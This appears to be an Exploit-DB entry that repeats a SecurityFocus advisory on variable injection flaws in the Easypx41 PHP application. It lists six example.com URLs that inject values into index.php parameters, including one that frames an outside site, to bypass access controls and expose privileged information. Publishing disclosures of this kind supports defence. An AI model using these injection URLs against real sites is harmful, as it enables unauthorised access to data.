https://www.exploit-db.com/exploits/26048

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/14421/info

Easypx41 is prone to multiple variable injection vulnerabilities.

An attacker can manipulate multiple script input variables and bypass access controls to retrieve sensitive and privileged information. Information obtained may aid in further attacks against the vulnerable application or the underlying system.

http://www.example.com/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20d?monstration.&msg=1103495330.dat&pgfull[variable-injection]
http://www.example.com/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
http://www.example.com/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull